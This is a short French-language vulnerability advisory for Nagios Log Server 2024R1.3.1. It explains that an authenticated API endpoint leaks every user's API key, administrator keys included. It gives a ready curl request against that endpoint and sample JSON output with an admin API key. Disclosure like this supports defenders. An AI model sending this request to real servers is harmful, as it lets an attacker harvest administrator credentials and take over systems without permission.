
Exposition de clé API authentifiée dans Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HPour la recherche et les tests autorisés uniquement. Veuillez ne pas l'utiliser contre des systèmes sans permission.
Une vulnérabilité au niveau de l'API dans Nagios Log Server 2024R1.3.1 permet à tout utilisateur disposant d'un jeton API valide de récupérer une liste complète des comptes utilisateurs ainsi que leurs clés API en clair, y compris les identifiants administrateur. Cette faille permet l'énumération d'utilisateurs, l'escalade de privilèges et la compromission totale du système via une utilisation non autorisée des jetons exposés.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]